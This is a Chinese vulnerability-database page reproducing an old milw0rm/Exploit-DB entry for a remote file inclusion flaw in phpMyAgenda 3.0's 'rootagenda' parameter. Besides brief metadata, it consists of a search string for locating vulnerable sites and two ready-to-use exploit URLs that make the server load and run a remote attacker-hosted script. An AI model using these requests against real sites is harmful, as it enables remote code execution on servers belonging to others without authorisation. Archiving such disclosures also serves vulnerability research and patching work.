phpMyAgenda 3.0 Final - 'rootagenda' Remote File Inclusion

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1055697 漏洞类型
发布时间 2006-04-30 更新时间 2006-04-30
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/1731
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Title: phpMyAgenda <=3.0 Final - Remote File Include Vulnerability
-----------------------------------------------------------------
Vendor: phpMyAgenda
URL: http://phpmyagenda.com
-----------------------------------------------------------------

Credits:
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
-----------------------------------------------------------------
Search for: "Powered by phpMyAgenda"
-----------------------------------------------------------------

Exploitation:

/agenda.php3?rootagenda=http://www.yourspace.com/yourscript.php?
/agenda2.php3?rootagenda=http://www.yourspace.com/yourscript.txt?

# milw0rm.com [2006-04-30]